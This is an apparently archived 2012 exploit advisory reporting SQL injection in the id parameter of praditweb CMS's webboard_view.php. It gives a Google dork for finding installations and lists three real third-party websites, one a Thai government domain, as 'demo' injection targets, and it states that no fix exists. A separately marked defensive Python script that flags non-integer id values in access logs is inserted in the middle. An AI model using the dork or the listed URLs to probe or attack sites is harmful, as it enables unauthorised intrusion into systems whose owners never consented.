praditweb CMS SQL injection

2012-07-04 08:25:27
Submitted by: Crim3R

# Exploit Title: praditweb Cms sql injection

# Google Dork: intext:"power by praditweb.com"

# Date: 30/06/2012

# Author: Crim3R

# software Link : http://www.praditweb.com/

# Version: All

# Tested on: all



========================================

There is an SQL injection vulnerability in webboard_view.php:

http://127.0.0.1/praditweb/webboard_view.php?id=1 [sql injection]
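
A defender-side check for the parameter described above, as an added example that is not part of the original advisory: it scans web-server access logs for requests to webboard_view.php whose id value is not a plain integer. The combined log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCRIPT = "webboard_view.php"   # script named in the advisory
PARAM = "id"                   # parameter named in the advisory
INTEGER_RE = re.compile(r"[0-9]+")

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Jul/2012:08:25:27 +0000] "GET /webboard_view.php?id=150 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [04/Jul/2012:08:26:01 +0000] "GET /webboard_view.php?id=150%27 HTTP/1.1" 200 812',
    '198.51.100.7 - - [04/Jul/2012:08:26:09 +0000] "GET /praditweb/webboard_view.php?id=1%2527 HTTP/1.1" 200 812',
    '192.0.2.10 - - [04/Jul/2012:08:27:00 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900',
]


def suspicious_ids(target):
    """Return the id values in one request target that are not plain integers."""
    parts = urlsplit(target)
    if not parts.path.endswith("/" + SCRIPT):
        return []
    # parse_qs percent-decodes once, which is what the application sees.
    # A double-encoded value still contains '%' after that and is flagged too.
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM, [])
    return [v for v in values if not INTEGER_RE.fullmatch(v)]


def scan(lines):
    """Return (client_ip, decoded_value) for every non-integer id in the log."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client_ip = line.split(" ", 1)[0]
        hits.extend((client_ip, v) for v in suspicious_ids(match.group(1)))
    return hits


if __name__ == "__main__":
    for client_ip, value in scan(SAMPLE_LOG):
        print(f"{client_ip} sent non-integer {PARAM}: {value!r}")
```

The same integer-only rule is what the application itself should enforce on id before the value reaches a query.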

========================================
Demo:

http://www.maerang.go.th/webboard_view.php?id=150'

http://www.chiangmaisurgery.com/webboard_view.php?id=23774'

http://bodyblinksure.com/webboard_view.php?id=8903'

===============Crim3R=====================

sites :

http://irist.ir/forum/

http://security7.ir/sc/


thanks to : Amir - Skote_vahshat- 2MzRp - Mikili -

and all IrIsT & security7 Members ...


Fixes

No fixes
